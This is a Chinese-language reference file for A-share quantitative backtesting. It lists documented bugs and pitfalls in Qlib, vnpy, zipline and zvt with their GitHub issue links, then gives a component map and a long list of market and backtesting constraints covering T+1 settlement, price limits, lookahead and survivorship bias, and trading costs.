### `AP-QLIB-2184` — 自定义 A 股数据导入前未按约定填充停牌日 NaN，引发下游因子噪声 <sub>(high)</sub>

Qlib 约定停牌日 open/close/high/low/volume/factor 字段均应填 NaN，以便框架 在因子计算时识别并跳过。用户自建 A 股数据集时若将停牌日保留为上一日价格 （常见于从东财/Wind 直接导出的数据），会导致停牌期间的价格动量因子出现 "假信号"（价格不变但因子非零）。Qlib 不校验此约定，错误静默流入训练数据。

Source: https://github.com/microsoft/qlib/issues/2184

### `AP-QLIB-1892` — PIT（Point-In-Time）财务数据收集器依赖外部股票列表接口，全量 A 股获取不完整 <sub>(high)</sub>

Qlib 的 PIT 数据收集器（财务数据时间点快照）在初始化时调用 get_hs_stock_symbols() 获取沪深股票列表。该函数依赖东财 API，经常仅返回 部分列表而非全量 5000+ 股票，且函数在获取不完整时直接 raise ValueError。 用户若按文档步骤操作，财务数据集将只覆盖部分股票，基于 PIT 财务因子的回测 存在严重生存者偏差（未被采集的股票被隐式排除）。

Source: https://github.com/microsoft/qlib/issues/1892

### `AP-QLIB-2097` — 全市场 instrument="all" 在 32GB 内存机器上 OOM，但 CSI300 正常 <sub>(medium)</sub>

Qlib 在加载 Alpha158 特征时会将指定 universe 的全部特征矩阵一次性载入内存。 使用 instrument="csi300"（300 股）与 instrument="all"（5000+ 股）的内存占用 差约 16 倍。32GB 机器跑全市场时在 init_instance_by_config 阶段直接 OOM， 错误信息不提示内存问题。用户容易误以为是配置错误，实际上需要分批加载或 使用流式特征计算。

Source: https://github.com/microsoft/qlib/issues/2097

### `AP-QLIB-1984` — LightGBM 模型标签维度校验逻辑永远不触发导致多标签训练静默失败 <sub>(medium)</sub>

Qlib gbdt.py 中用 y.values.ndim == 2 判断是否为多标签，但从 DataFrame 取出的 Series 的 ndim 永远为 1，条件永远为 False，因此多标签训练不会走 squeeze 分支，而是直接进入 LightGBM 训练并在更深处抛出语义不明的错误。 用户尝试自定义多标签任务时无法从错误信息定位到此根因。

Source: https://github.com/microsoft/qlib/issues/1984

### `AP-QLIB-1915` — 自定义 CSV 数据 dump_bin 后 DataHandler 报 Length mismatch，D.features 却正常 <sub>(high)</sub>

Qlib 存在两套数据访问路径：D.features（直接读 binary）和 DataHandler/DataHandlerLP （带 processor pipeline）。自定义 A 股 CSV 数据在 dump_bin 时若字段顺序 或 symbol 格式（如 600000.SH vs SH600000）与 Qlib 约定不符，DataHandler 的 processor 在 align/reindex 时触发 Length mismatch，而 D.features 因不 经过 processor 而成功。这一"两套路径行为不一致"让用户误以为数据已正确导入。

Source: https://github.com/microsoft/qlib/issues/1915

### `AP-QLIB-1949` — Colab/Linux 多进程后端与 Qlib ParallelExt 冲突导致 DataHandler 完全不可用 <sub>(medium)</sub>

Qlib 在非 fork 环境（Windows 或 Google Colab）中，DataHandler 使用 joblib 并行加载特征时，ParallelExt 初始化时访问 _backend_args 属性失败（AttributeError）。 根因是 joblib 1.5+ 移除了该内部属性，Qlib 的兼容层未更新。表现为 D.features 调用抛出多层嵌套异常，用户无法从错误栈判断是并行后端问题还是数据问题。

Source: https://github.com/microsoft/qlib/issues/1949

## vnpy (4)

### `AP-VNPY-3691` — K 线生成器首根 K 线时间戳不对齐，导致第一个周期信号错误 <sub>(high)</sub>

vnpy BarGenerator 在合成 N 分钟 K 线时，第一根推送的 K 线时间戳为"当前 tick 所在分钟"而非"完整 N 分钟周期结束时间"。具体表现：09:59 的 tick 会 触发一根不完整的 5 分钟 K 线推送（本应等到 10:04 才推送）。策略若在 on_bar 中直接用 datetime.minute % 5 过滤，第一根 K 线恰好通过，但包含的 数据不足一个完整周期，用于信号计算会产生错误的开仓信号。

Source: https://github.com/vnpy/vnpy/issues/3691

### `AP-VNPY-3669` — Alpha 模块历史数据增量保存时新旧 DataFrame schema 不兼容导致 SchemaError <sub>(medium)</sub>

vnpy Alpha 模块在保存 K 线数据到 Parquet 文件时，将新下载数据（可能含 Float64 列）与已存文件（历史 Int64 列）直接 polars.concat。polars 强类型 不允许隐式类型提升，抛出 SchemaError。根因是不同数据源/版本返回的字段类型 不一致（如 volume 在部分行情源为整数，在另一些为浮点），且 concat 前无 schema 对齐步骤。影响所有使用 vnpy alpha 进行回测的历史数据构建流程。

Source: https://github.com/vnpy/vnpy/issues/3669

### `AP-VNPY-3685` — 价差交易模块 run_backtesting() 在 Jupyter 环境下静默报错，结果不可信 <sub>(high)</sub>

vnpy 4.10 价差交易（SpreadTrading）模块的 run_backtesting() 在 Jupyter 环境下存在事件循环冲突（asyncio already running），导致回测引擎部分逻辑 不执行但不抛异常，返回看似正常的回测统计数据。同样代码在命令行 Python 中无此问题。vnpy 4.x 将部分 IO 改为 async 但 Jupyter 的事件循环与之不兼容， 是"回测结果看起来正确但实际不完整"的隐蔽陷阱。

Source: https://github.com/vnpy/vnpy/issues/3685

### `AP-VNPY-3700` — 安装脚本不使用 venv 导致全局 numpy 版本被降级破坏其他依赖 <sub>(medium)</sub>

vnpy install.bat 直接在系统/conda base 环境安装，会强制降级 numpy 到 <2.0 以满足 vnpy 依赖，破坏依赖 numpy 2.x 的其他量化工具（如 scipy、pytorch 新版）。 没有 requirements.txt，依赖边界不透明。在多工具共存的量化研究环境中， vnpy 的安装脚本是"全局环境污染"的常见根源。

Source: https://github.com/vnpy/vnpy/issues/3700

## zipline (6)

### `AP-ZIPLINE-138` — 回测价格为未复权价，教程图表误导用户误判策略收益 <sub>(high)</sub>

Zipline 教程使用 AAPL 股价图做演示，但 bundle 中存储的是未复权价格（raw price）， 而非经过拆股/分红调整的复权价。图表显示的历史价格与市场实际价约差 4 倍（Apple 历次拆股累计因子），用户误将"价格翻 4 倍"当作策略收益。A 股场景更严重： 除权前后价格跳变会在未复权数据中形成巨大"信号"，吸引技术指标在除权日产生 虚假突破信号。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/138

### `AP-ZIPLINE-235` — 默认以当根 K 线收盘价成交，低估实盘滑点，策略回测收益虚高 <sub>(high)</sub>

Zipline 默认滑点模型在当根 K 线触发信号后，以同根 K 线收盘价成交（current bar close fill）。实盘中信号只能在下一根 K 线的开盘价附近成交（T+1 order execution）。以 A 股日线为例，用收盘价回测比用次日开盘价成交平均高估日收益 约 0.1-0.3%，年化差距可超 30%。需显式配置 slippage model 为 VolumeShareSlippage 或 FixedSlippage 并设合理 volume_limit。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/235

### `AP-ZIPLINE-190` — 日历 start_session 设为非交易日触发 DateOutOfBounds，无提示如何修正 <sub>(medium)</sub>

Zipline 在注册 bundle 或运行算法时，若 start_session 参数恰好是非交易日 （如 1998-01-01 元旦），Calendar 校验抛出 DateOutOfBounds（"cannot be earlier than the first session"）。错误信息仅显示交易日历起始日，不提示"请改为第一个 交易日"。A 股场景：使用 SSE/SZSE 日历时，若 start_date 恰好是春节前最后 一天次日（节假日），会触发同类错误，调试成本极高。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/190

### `AP-ZIPLINE-181` — asset db 过期后 Pipeline 报"no assets traded"，误导用户排查数据范围 <sub>(high)</sub>

Zipline 的 asset database（SQLite）记录每只股票的 start/end 交易日期。若 使用了旧版 Quandl/自建 bundle 且未重新 ingest，在回测新日期范围时 Pipeline 抛出 "Failed to find any assets with country_code 'US' that traded between [dates]"。A 股场景：重新下载行情后若只更新价格数据而未重建 asset db，退市/ 新上市股票的日期范围不更新，Pipeline 过滤会悄悄排除这些股票，产生生存者偏差。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/181

### `AP-ZIPLINE-285` — week_start()/week_end() 在自定义日历（非美股）下静默失效 <sub>(medium)</sub>

Zipline schedule_function 的 date_rules.week_start() 和 date_rules.week_end() 依赖交易日历的周首/周末判断逻辑，但在非美股日历（如 ASX、SSE）中，该逻辑 与 NYSE 日历的偏移计算不兼容，导致 schedule 永远不触发或在错误的日期触发。 A 股场景：使用 SSE 日历时，含春节等连续长假的周，week_start 可能跳过整个 假期周而不调仓，但用户无法从日志发现未触发的调度。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/285

### `AP-ZIPLINE-240` — 回测日期时区必须为 UTC，传入 naive datetime 引发深层 AssertionError <sub>(medium)</sub>

Zipline 内部强制要求所有时间戳为 UTC aware datetime。当用户传入 naive datetime （无时区信息，如 pd.Timestamp('2020-01-01')）时，不在入口处报错，而是在 算法执行深处触发 AssertionError: Algorithm should have a utc datetime，栈深 难以定位。A 股开发者从本地 CST 时间导入数据时极易触发此陷阱，需在 bundle 注册时显式 tz_localize('UTC')。

Source: https://github.com/stefan-jansen/zipline-reloaded/issues/240

## zvt (6)

### `AP-ZVT-183` — 除权因子为 inf/NaN 时直接参与乘法导致复权静默失败 <sub>(high)</sub>

ZVT 在计算前复权因子时以 new/old 价格比计算 qfq_factor。当 old==0（新股首日 或数据缺失）时因子为 inf；当 kdata.open 本身为 None（停牌日未填充）时乘法 抛出 TypeError。结果：整个 entity 的复权计算中断，后续 K 线全部丢失，但主 流程只 log ERROR 不中断，用户往往不知道已有大量股票数据损坏。

Source: https://github.com/zvtvz/zvt/issues/183

### `AP-ZVT-179` — 第三方数据接口超限后异常被吞噬，数据静默缺失 <sub>(high)</sub>

ZVT 使用聚宽 jqdatasdk 批量拉取全市场 K 线时（4000+ 股票），触发聚宽每日 最大查询条数限制（错误：已超过每日最大查询数量）。ZVT 捕获异常后继续执行下一 entity，导致超限后所有股票的当日数据均静默缺失。回测若使用该残缺数据库，因 子计算结果将产生系统性偏差，且无告警。

Source: https://github.com/zvtvz/zvt/issues/179

### `AP-ZVT-161` — 全市场 SQLite 批量因子计算触发 too many SQL variables 错误 <sub>(medium)</sub>

ZVT 在计算 VolumeUpMaFactor 等多股因子时，将所有 entity_id 拼入单条 SQL 的 IN 子句。当 A 股全市场（5000+ 股）一次性查询时，触发 SQLite 默认限制 SQLITE_MAX_VARIABLE_NUMBER=999。调大 max_allowed_packet（MySQL 参数）无效， 根因是 SQLite 变量数上限。正确解法是分批查询，但 ZVT 早期版本未处理此边界。

Source: https://github.com/zvtvz/zvt/issues/161

### `AP-ZVT-129` — 使用通配符导入隐藏 API 版本变更，AdjustType 等枚举莫名消失 <sub>(medium)</sub>

ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-099--TradingAgents-CN
**Scan date**: 2026-04-22
**Stats**: {'total_files': 9, 'total_classes': 41, 'total_functions': 0, 'total_stages': 9}

## Modules (9)

- [data_collection](components/data_collection.md): 4 classes
- [multi-analyst_pipeline](components/multi-analyst_pipeline.md): 6 classes
- [investment_debate](components/investment_debate.md): 5 classes
- [trading_decision](components/trading_decision.md): 2 classes
- [risk_debate](components/risk_debate.md): 5 classes
- [signal_processing](components/signal_processing.md): 4 classes
- [reflection_&_memory](components/reflection_-_memory.md): 4 classes
- [web_api_service](components/web_api_service.md): 6 classes
- [llm_provider_abstraction](components/llm_provider_abstraction.md): 5 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 148
  fatal_constraints_count: 57
  non_fatal_constraints_count: 228
  use_cases_count: 29
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (71)

- **`SHARED-CN-ASTOCK-T1-001`** <sub>(fatal)</sub>: A 股股票实行 T+1 交收制度：T 日买入的股票最早 T+1 日方可卖出。 T 日卖出所得资金可当日再用于买入。回测框架若未施加 T+1 持仓锁定， 将高估换手率与策略胜率，尤其损害日内反转类策略的真实性。
- **`SHARED-CN-ASTOCK-T1-002`** <sub>(fatal)</sub>: 沪深主板股票日涨跌幅上限为 ±10%（ST/SST 股票 ±5%）。 涨停封板时买方消失、跌停封板时卖方消失；回测若假设当日可以任意价格 成交，会系统性高估可执行性。封板检测应在成交模拟层强制实施。
- **`SHARED-CN-ASTOCK-T1-003`** <sub>(high)</sub>: 科创板和创业板（2020年8月改革后）正常交易日涨跌幅为 ±20%； 北交所 ±30%；新股上市后前5个交易日不设涨跌幅限制。 回测若对所有股票统一套用 ±10% 过滤逻辑，会错误剔除或错误包含这些板块的成交。
- **`SHARED-CN-ASTOCK-T1-004`** <sub>(high)</sub>: ST/*ST 股票日涨跌幅限制为 ±5%，流动性极差，成交假设不可与正常股票混用。 包含历史 ST 股票（最终退市）但不纳入回测会产生幸存者偏差； 纳入回测但不区分 ST 涨跌幅会错误模拟成交。
- **`SHARED-CN-ASTOCK-T1-005`** <sub>(medium)</sub>: A 股开盘集合竞价（9:15-9:25）和收盘集合竞价（14:57-15:00）期间， 成交价由"最大成交量原则"确定，非即时撮合。回测以开盘价或收盘价假设 即时全量成交会低估实际滑点风险，大单策略尤为明显。
- **`SHARED-CN-ASTOCK-T1-006`** <sub>(high)</sub>: 停牌制度：A 股长期停牌（2018年前可长达数月）期间，持仓资金被锁定， 无法再平衡，机会成本在回测中普遍被忽略。应在因子计算前过滤停牌日 （volume == 0 或 is_suspended == True），停牌期间不发出信号。
- **`SHARED-CN-ASTOCK-T1-007`** <sub>(high)</sub>: 新股上市后前5个交易日无涨跌幅限制（首日涨幅可超300%）， 且无完整历史数据（均线/波动率/换手率因子无法计算）。 应在因子计算前过滤上市不足 N 个交易日（通常 60-252 日）的股票。
- **`SHARED-CN-ASTOCK-T1-008`** <sub>(high)</sub>: A 股程序化交易监管新规（2025年7月7日施行）：单账户每秒申报/撤单 ≥ 300 笔， 或单日申报/撤单 ≥ 20000 笔，被认定为高频交易，须向交易所报备。 AI 生成的量化策略若频率超标则无法合规运行，应在策略设计期提示。
- **`SHARED-CN-ASTOCK-ADJ-001`** <sub>(fatal)</sub>: 除权除息日股价跳空是账面调整而非真实亏损。复权选择： 不复权会虚增策略亏损；前复权会将历史价格内嵌未来分红信息（lookahead bias）； 后复权以上市首日为基准累积，是量化回测的最优选择。
- **`SHARED-CN-ASTOCK-ADJ-002`** <sub>(fatal)</sub>: A 股上市公司财务报告披露有法定延迟：年报在次年4月30日前、 半年报在8月31日前、季报分别在4月30日（一季）/10月31日（三季）前披露。 回测中使用财务数据时，必须以实际披露日期（announcement_date）而非 会计期间结束日作为数据可用时间点，否则引入 point-in-time lookahead bias。
- **`SHARED-CN-ASTOCK-ADJ-003`** <sub>(high)</sub>: 分红送股转增和配股会导致除权除息日后股本增加，历史持股数量不变但股价等比 缩水，若回测系统未同步调整持仓股数，会在除权日产生虚假亏损或盈利。
- **`SHARED-CN-ASTOCK-ADJ-004`** <sub>(medium)</sub>: 大宗交易与竞价交易价差：大宗交易成交价可比市价折价最多 10%（主板）， 但此价格不影响次日竞价开盘。大宗交易数据出现在收盘后，若将其混入 日内 OHLCV 数据，会污染收盘价和成交量的正常计算。
- **`SHARED-CN-ASTOCK-ADJ-005`** <sub>(fatal)</sub>: 融资融券（两融）做空限制：A 股散户无法直接卖空，融券标的池有限（主要为 大盘蓝筹，中小盘融券极度稀缺），融券利率远高于融资利率。 回测若直接假设可做空任意股票，会产生不可执行的策略，实盘与回测严重背离。
- **`SHARED-CN-ASTOCK-FX-001`** <sub>(high)</sub>: 通过沪深港通（北向）买入股票，境外投资者合计持股上限 30%，预警线 28%。 当外资持股比例达 28% 时，联交所暂停该股新增买盘，直到降至 26% 才恢复。 策略若重仓外资偏好股（消费/医药龙头），需监控外资持股比例。
- **`SHARED-CN-ASTOCK-FX-002`** <sub>(high)</sub>: 5% 举牌规则：单一投资者持有上市公司已发行股份超过 5%，须在3日内向证监会 和交易所报告并公告；在此期间及公告后2日内不得再买卖。 量化选股系统若不考虑此规则，重仓股超过 5% 阈值后将面临强制停止买入。
- **`SHARED-CN-ASTOCK-FX-003`** <sub>(high)</sub>: 公募基金"双十原则"：单基金持有单只股票不超过净资产 10%， 同一基金管理人旗下所有基金合计不超过该公司已发行股份 10%。 量化选股组合若部署于公募基金，需在优化约束中强制加入合规上限。
- **`SHARED-CN-ASTOCK-FX-004`** <sub>(fatal)</sub>: 内幕交易边界：AI 辅助量化系统的所有输入数据必须来自公开已披露信息。 通过非公开渠道（私有数据服务/内部消息/重组前预知）触发的自动化交易 构成内幕交易，适用《证券法》第80-83条及《内幕交易行为认定指引》。
- **`SHARED-CN-ASTOCK-MKT-001`** <sub>(fatal)</sub>: 幸存者偏差：使用当前 A 股成分股（如当前沪深300）作为历史回测股票池， 会遗漏曾被纳入指数但因业绩差被调出或退市的股票。2020-2024年 A 股 退市数量加速（41家/年创纪录），此偏差日趋严重。必须使用历史时点快照。
- **`SHARED-CN-ASTOCK-MKT-002`** <sub>(medium)</sub>: 指数成分股调整效应：沪深300/中证500等每半年调整一次（6月/12月）， 被纳入股票通常在公告日至生效日之间显著上涨（被动资金被动买入）， 被剔除股票则相反。回测股票池应使用历史成分股快照，并标注调整窗口期。
- **`SHARED-CN-ASTOCK-MKT-003`** <sub>(high)</sub>: 策略拥挤（Strategy Crowding）：大量量化私募使用相似因子模型时， 持仓高度重叠，遇市场冲击时集体卖出形成踩踏。2024年2月 A 股量化危机 是典型案例（小盘股指数单日跌幅超 10%）。需监控因子多头持仓与 主流量化基金的重叠率。
- **`SHARED-CN-ASTOCK-MKT-004`** <sub>(high)</sub>: A 股量化对冲策略常用 IF/IC/IM 股指期货做多/空对冲系统性风险。 但 A 股股指期货长期处于贴水（远期价格 < 现货），IC 年化贴水可达 10-20%。 回测若仅考虑价格收益而忽略期货贴水/升水，会严重高估对冲策略净收益。
- **`SHARED-CN-ASTOCK-MKT-005`** <sub>(high)</sub>: A 股月度动量因子在方向上与美股相反：近1个月表现最好的股票， 下1个月大概率反转（反转效应而非动量）。机构研究（华泰/东吴证券） 与学术论文均验证：直接套用美股月度动量因子在 A 股会产生系统性亏损。
- **`SHARED-CN-ASTOCK-BF-001`** <sub>(medium)</sub>: 处置效应（Shefrin & Statman 1985）在 A 股散户中尤为显著： 投资者倾向于过早卖出盈利股票、过长持有亏损股票。上交所实证研究证实 超过 90% 的个人账户存在此效应，AI 辅助工具不应迁就"持有亏损等解套" 的直觉，而应基于量化信号提供纪律性止损止盈建议。
- **`SHARED-CN-ASTOCK-BF-002`** <sub>(medium)</sub>: A 股以散户为主（个人账户交易量占比超 80%），羊群效应显著：散户倾向于 跟风操作，导致价格非理性波动（如 2015年杠杆牛熊）。量化策略应避免 使用成交量排行/热度排行等可能强化羊群信号的指标作为主要因子。
- **`SHARED-CN-ASTOCK-BF-003`** <sub>(medium)</sub>: 过度自信效应（Barber & Odean 2000）在 A 股散户中更严重：散户年均换手率 超 500%，机构长期收益显著优于散户。高换手率策略经交易成本后净收益往往 更低。AI 不应鼓励"频繁操作"，而应推荐低频高质信号驱动交易。
- **`SHARED-CN-ASTOCK-BF-004`** <sub>(medium)</sub>: A 股日历效应：春节效应（节前5日和节后1-3日倾向上涨）、月初效应 （月初第1-5个交易日表现优于月中/月末）已有学术实证（南京财经大学等）。 策略应在日历特殊窗口降低信号置信度，或单独评估日历驱动收益的贡献。
- **`SHARED-CN-ASTOCK-BF-005`** <sub>(high)</sub>: 策略容量（Capacity）限制：A 股小盘/微盘股日均成交额仅数百万， 大资金买入/卖出会造成严重价格冲击，策略实际容量可能仅几千万元。 回测结果不可外推至亿级资金，应在回测中加入成交量比例上限约束。
- **`SHARED-CN-ASTOCK-COST-001`** <sub>(fatal)</sub>: A 股完整交易成本结构（2023年8月调整后）：印花税卖出单向 0.05%； 佣金双向约 0.01%（最低5元）；过户费（沪市）0.001%； 滑点/冲击成本小盘股 0.1%-0.5%/次。忽略成本的回测策略年化收益率 具有欺骗性，高频/高换手策略尤甚。
- **`SHARED-CN-ASTOCK-COST-002`** <sub>(high)</sub>: 市场冲击成本（Market Impact）在回测中通常完全缺失，但在实盘中可能是 最大成本来源。A 股小盘股 100 万元买入可能推高 1% 以上。冲击成本与 成交规模呈幂律而非线性关系，应使用 Almgren-Chriss 模型或简化版估算。
- **`SHARED-CN-ASTOCK-COST-003`** <sub>(medium)</sub>: 大股东/董监高减持新规（证监会第224号令，2024年5月）：持股5%以上大股东 通过集中竞价减持须提前15个交易日披露减持计划，3个月内不超过股份总数1%。 解禁股减持压力是 A 股特有的系统性风险因子，回测中忽略解禁日历会低估 相关股票的持股风险。
- **`SHARED-CN-ASTOCK-DATA-001`** <sub>(high)</sub>: A 股交易日历与自然日历不一致：存在法定节假日调休导致的"补班日"（周六上班）， 以及临时停市（2015年7月8日至7月10日因股灾紧急停市）。 使用通用工作日历（weekdays）推算 A 股交易日会产生偏差， 必须使用 A 股专用交易日历（如 exchange_calendars 或 tushare 的交易日接口）。
- **`SHARED-CN-ASTOCK-DATA-002`** <sub>(medium)</sub>: A 股退市后股票代码可能被新股重用（极少见但存在）。使用纯代码（如 '000001'） 作为历史数据主键而不包含交易所后缀（'.SZ'）或上市日期范围，可能导致 历史数据与当前股票的错误混淆，长周期回测中需特别注意。
- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
